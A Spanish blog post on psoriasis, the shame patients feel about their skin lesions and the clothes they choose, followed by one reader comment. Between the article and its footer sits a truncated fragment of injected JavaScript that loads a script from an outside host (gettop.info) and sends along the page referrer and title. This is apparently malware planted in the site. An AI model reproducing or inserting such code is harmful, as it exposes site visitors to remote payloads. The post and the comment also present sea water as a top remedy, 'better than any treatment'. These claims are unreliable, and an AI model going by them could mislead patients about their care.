Salud y belleza » Enfermedades, Salud

Qué ropa debes usar si tienes psoriasis

1 Comentario

La psoriasis es una enfermedad inflamatoria autoinmune que afecta a la piel, formando placas rosáceas que causan picor y escamas en la piel. Muchas personas intentan tapar esas marcas con su ropa y 3 de cada 5 pacientes de psoriasis reconoce que su patología influye en la ropa que elige. Por tanto, se podría decir que esta patología limita muchos aspectos de su vida diaria, sobre todo los relacionados con su ropa y su aspecto físico.

psoriasis-playa

Con la llegada del verano el problema se agudiza ya que se usa ropa más ligera y deja al descubierto más el cuerpo. El 70% de los pacientes de psoriasis aseguran que han sentido alguna vez vergüenza por culpa de su patología, sobre todo en verano. Esto disminuye su confianza y su autoestima.

Los pacientes de psoriasis aseguran que en los brazos es más fácil disimular las marcas de la psoriasis, pero que en las piernas las lesiones son más llamativas y la gente suele mirar más. Lo ideal para reducir esas lesiones es aplicar los productos recomendados y acudir a menudo a la playa. El agua del mar es uno de los remedios más efectivos contra las marcas de la psoriasis y ayuda a relajar la piel y a reducir los picores.

psoriasis-agua-mar

Lo más importante para tratar la psoriasis es el diagnóstico precoz que favorece el manejo idóneo de la enfermedad, además de la prescripción del mejor tratamiento lo antes posible para evitar que la psoriasis se agrave. Es una enfermedad que no tiene cura pero cuyos síntomas se pueden reducir considerablemente con los tratamientos adecuados.

¿Sueles elegir ropa en función de tus marcas de psoriasis?

s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; if (document.currentScript) {

Más consejos de salud y belleza : ,

One Comment »

  • lorena said:

    la suerte que tengo es que vivo al lado de la playa así que bajo siempre que puedo, por lo menos una vez a la semana, y me meto entera en el agua de la playa. funciona de verdad y me deja la piel mucho mejor. mejor que cualquier tratamiento o crema.

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.